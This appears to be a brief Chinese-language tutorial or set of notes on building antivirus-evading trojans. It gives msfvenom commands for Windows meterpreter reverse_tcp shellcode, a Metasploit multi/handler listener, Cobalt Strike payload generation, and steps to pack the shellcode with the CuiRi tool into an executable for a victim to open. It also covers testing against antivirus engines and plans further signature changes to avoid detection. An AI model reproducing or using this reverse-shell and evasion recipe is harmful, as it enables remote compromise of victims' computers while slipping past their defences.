Cuiri免杀绕过:https://github.com/NyDubh3/CuiRi
Metasploit生成木马:
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.52.128 lport=3333 -f c #导出C语言的shellcode
监听语句:handler -p windows/x64/meterpreter/reverse_tcp -H 192.168.52.128 -P 3333
Cobalt Strike生成木马:
攻击 -> 生成后门 -> Payload Generator
Kali测试机Metasploit监控:
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.52.128
set LPORT 3333
run
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.52.128 lport=3333 -f c #导出C语言的shellcode
复制下面内容重新创建1.txt放在与cuiri.win64.exe同目录下
cuiri_win64.exe -f 1.txt #导出hoshinoGen.exe文件
用户机打开hoshinoGen.exe
Kali机打开监听获取到权限
平台测试:VirSCAN.org-多引擎在线病毒扫描网 v1.02,当前支持 47 款杀毒引擎https://www.virscan.org/language/zh-cn/
注:如果打开运行,则win10会检测到病毒,下一步为修改.exe特征码问题